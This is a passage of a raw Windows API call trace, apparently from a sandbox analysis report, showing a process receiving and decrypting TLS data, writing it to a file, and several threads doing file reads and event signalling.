	[0233.699] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32991f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32991f0, pfQOP=0x0) returned 0x0
	[0233.699] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.699] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.699] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.700] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32993e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32993e0, pfQOP=0x0) returned 0x0
	[0233.700] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.700] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.700] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.701] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32995d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32995d0, pfQOP=0x0) returned 0x0
	[0233.701] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.701] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.701] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.702] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32997c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32997c0, pfQOP=0x0) returned 0x0
	[0233.702] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.702] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.702] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.702] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x32999b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x32999b0, pfQOP=0x0) returned 0x0
	[0233.703] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.703] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.703] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.703] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3299ba0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3299ba0, pfQOP=0x0) returned 0x0
	[0233.703] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.704] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.704] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.704] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3299d90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3299d90, pfQOP=0x0) returned 0x0
	[0233.706] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.712] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.712] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.712] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x3299f80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3299f80, pfQOP=0x0) returned 0x0
	[0233.712] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.713] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.713] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.713] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329a170, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329a170, pfQOP=0x0) returned 0x0
	[0233.713] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.715] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.715] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.715] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329a360, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329a360, pfQOP=0x0) returned 0x0
	[0233.715] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.716] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.716] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.716] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329a550, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329a550, pfQOP=0x0) returned 0x0
	[0233.716] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.717] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.717] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.717] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329a740, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329a740, pfQOP=0x0) returned 0x0
	[0233.717] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.718] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.718] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.719] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329a930, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329a930, pfQOP=0x0) returned 0x0
	[0233.719] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.720] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.720] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.720] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329ab20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329ab20, pfQOP=0x0) returned 0x0
	[0233.720] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.721] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.721] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.721] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329ad10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329ad10, pfQOP=0x0) returned 0x0
	[0233.721] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.722] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.722] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.722] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329af00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329af00, pfQOP=0x0) returned 0x0
	[0233.722] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.723] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.723] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.723] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329b0f0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329b0f0, pfQOP=0x0) returned 0x0
	[0233.723] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.724] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.724] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.724] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329b2e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329b2e0, pfQOP=0x0) returned 0x0
	[0233.724] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.724] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.724] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.725] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329b4d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329b4d0, pfQOP=0x0) returned 0x0
	[0233.725] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.725] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.725] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.725] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329b6c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329b6c0, pfQOP=0x0) returned 0x0
	[0233.726] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x4000, lpOverlapped=0x0) returned 1
	[0233.726] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.726] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.727] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329b8b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329b8b0, pfQOP=0x0) returned 0x0
	[0233.727] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.727] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.728] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329baa0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329baa0, pfQOP=0x0) returned 0x0
	[0233.728] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.728] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.729] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329bc90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329bc90, pfQOP=0x0) returned 0x0
	[0233.729] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.730] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.730] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329be80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329be80, pfQOP=0x0) returned 0x0
	[0233.730] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.730] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.730] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329c070, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329c070, pfQOP=0x0) returned 0x0
	[0233.739] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.739] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.739] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329c260, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329c260, pfQOP=0x0) returned 0x0
	[0233.740] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.740] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.740] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329c450, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329c450, pfQOP=0x0) returned 0x0
	[0233.741] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.741] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.741] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329c640, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329c640, pfQOP=0x0) returned 0x0
	[0233.742] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.742] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.742] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329c830, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329c830, pfQOP=0x0) returned 0x0
	[0233.743] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.743] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.743] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329ca20, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329ca20, pfQOP=0x0) returned 0x0
	[0233.743] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.743] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.744] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329cc10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329cc10, pfQOP=0x0) returned 0x0
	[0233.744] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.744] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.745] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329ce00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329ce00, pfQOP=0x0) returned 0x0
	[0233.745] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.745] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.745] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329cff0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329cff0, pfQOP=0x0) returned 0x0
	[0233.746] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.746] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.747] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329d1e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329d1e0, pfQOP=0x0) returned 0x0
	[0233.748] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.748] recv (in: s=0x610, buf=0x327e02d, len=16416, flags=0 | out: buf=0x327e02d*) returned 16416
	[0233.749] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329d3d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329d3d0, pfQOP=0x0) returned 0x0
	[0233.750] recv (in: s=0x610, buf=0x327e028, len=5, flags=0 | out: buf=0x327e028*) returned 5
	[0233.750] recv (in: s=0x610, buf=0x327e02d, len=5920, flags=0 | out: buf=0x327e02d*) returned 5920
	[0233.750] DecryptMessage (in: phContext=0x1c80ccc0, pMessage=0x329d5c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x329d5c0, pfQOP=0x0) returned 0x0
	[0233.834] SetEvent (hEvent=0x4f8) returned 1
	[0233.836] WriteFile (in: hFile=0x4c8, lpBuffer=0x32834c0*, nNumberOfBytesToWrite=0x1704, lpNumberOfBytesWritten=0x1c80d2c8, lpOverlapped=0x0 | out: lpBuffer=0x32834c0*, lpNumberOfBytesWritten=0x1c80d2c8*=0x1704, lpOverlapped=0x0) returned 1
	[0233.838] CloseHandle (hObject=0x4c8) returned 1
	[0234.113] send (s=0x404, buf=0x329dc78*, len=21, flags=0) returned 21
	[0234.114] recv (s=0x404, buf=0x30764f8, len=502, flags=0) 

Thread:
	id = 173
	os_tid = 0x388


Thread:
	id = 176
	os_tid = 0x6d8


Thread:
	id = 229
	os_tid = 0xb8c


Thread:
	id = 251
	os_tid = 0xc0c


Thread:
	id = 254
	os_tid = 0xc18


Thread:
	id = 289
	os_tid = 0xc5c


Thread:
	id = 295
	os_tid = 0xc80

	[0216.624] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.627] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea78, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea78*=0x1e, lpOverlapped=0x0) returned 1
	[0216.803] SetEvent (hEvent=0x4d8) returned 1
	[0216.803] SetEvent (hEvent=0x4e0) returned 1
	[0216.803] SetEvent (hEvent=0x4d8) returned 1
	[0216.803] SetEvent (hEvent=0x4e0) returned 1
	[0216.804] SetEvent (hEvent=0x4d8) returned 1
	[0216.804] SetEvent (hEvent=0x4e0) returned 1
	[0216.804] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x2f, lpOverlapped=0x0) returned 1
	[0217.522] SetEvent (hEvent=0x4d8) returned 1
	[0217.522] SetEvent (hEvent=0x4e0) returned 1
	[0217.522] SetEvent (hEvent=0x4d8) returned 1
	[0217.522] SetEvent (hEvent=0x4e0) returned 1
	[0217.523] SetEvent (hEvent=0x4d8) returned 1
	[0217.523] SetEvent (hEvent=0x4e0) returned 1
	[0217.523] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x29, lpOverlapped=0x0) returned 1
	[0217.524] SetEvent (hEvent=0x4d8) returned 1
	[0217.524] SetEvent (hEvent=0x4e0) returned 1
	[0217.524] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x45, lpOverlapped=0x0) returned 1
	[0217.525] SetEvent (hEvent=0x4d8) returned 1
	[0217.525] SetEvent (hEvent=0x4e0) returned 1
	[0217.525] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x36, lpOverlapped=0x0) returned 1
	[0217.526] SetEvent (hEvent=0x4d8) returned 1
	[0217.526] SetEvent (hEvent=0x4e0) returned 1
	[0217.527] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x36, lpOverlapped=0x0) returned 1
	[0218.015] SetEvent (hEvent=0x4d8) returned 1
	[0218.015] SetEvent (hEvent=0x4e0) returned 1
	[0218.015] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x34, lpOverlapped=0x0) returned 1
	[0218.020] SetEvent (hEvent=0x4d8) returned 1
	[0218.020] SetEvent (hEvent=0x4e0) returned 1
	[0218.020] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x43, lpOverlapped=0x0) returned 1
	[0218.024] SetEvent (hEvent=0x4d8) returned 1
	[0218.024] SetEvent (hEvent=0x4e0) returned 1
	[0218.025] SetEvent (hEvent=0x4d8) returned 1
	[0218.025] SetEvent (hEvent=0x4e0) returned 1
	[0218.025] SetEvent (hEvent=0x4d8) returned 1
	[0218.025] SetEvent (hEvent=0x4e0) returned 1
	[0218.025] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x3b, lpOverlapped=0x0) returned 1
	[0218.031] SetEvent (hEvent=0x4d8) returned 1
	[0218.031] SetEvent (hEvent=0x4e0) returned 1
	[0218.031] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x29, lpOverlapped=0x0) returned 1
	[0218.032] SetEvent (hEvent=0x4d8) returned 1
	[0218.032] SetEvent (hEvent=0x4e0) returned 1
	[0218.033] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x37, lpOverlapped=0x0) returned 1
	[0218.035] SetEvent (hEvent=0x4d8) returned 1
	[0218.035] SetEvent (hEvent=0x4e0) returned 1
	[0218.035] SetEvent (hEvent=0x4d8) returned 1
	[0218.035] SetEvent (hEvent=0x4e0) returned 1
	[0218.036] SetEvent (hEvent=0x4d8) returned 1
	[0218.036] SetEvent (hEvent=0x4e0) returned 1
	[0218.036] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x3b, lpOverlapped=0x0) returned 1
	[0218.038] SetEvent (hEvent=0x4d8) returned 1
	[0218.038] SetEvent (hEvent=0x4e0) returned 1
	[0218.038] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8*, lpNumberOfBytesRead=0x1cacea38*=0x29, lpOverlapped=0x0) returned 1
	[0218.039] SetEvent (hEvent=0x4d8) returned 1
	[0218.039] SetEvent (hEvent=0x4e0) returned 1
	[0218.039] ReadFile (in: hFile=0x4e8, lpBuffer=0x3262bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cacea38, lpOverlapped=0x0 | out: lpBuffer=0x3262bf8, lpNumberOfBytesRead=0x1cacea38*=0x0, lpOverlapped=0x0) returned 0
	[0218.051] CoUninitialize () 

Thread:
	id = 298
	os_tid = 0xc8c

	[0216.859] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0216.861] ReadFile (in: hFile=0x4f4, lpBuffer=0x3265d48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccfeef8, lpOverlapped=0x0 | out: lpBuffer=0x3265d48, lpNumberOfBytesRead=0x1ccfeef8*=0x0, lpOverlapped=0x0) returned 0
	[0218.053] SetEvent (hEvent=0x4fc) returned 1
	[0218.054] SetEvent (hEvent=0x4d8) returned 1
	[0218.054] SetEvent (hEvent=0x4e0) returned 1
	[0218.054] SetEvent (hEvent=0x500) returned 1
	[0218.054] CoUninitialize () 

Thread:
	id = 304
	os_tid = 0xca4


Thread:
	id = 307
	os_tid = 0xcb0


Thread:
	id = 309
	os_tid = 0xcbc


Thread:
	id = 310
	os_tid = 0xcc0

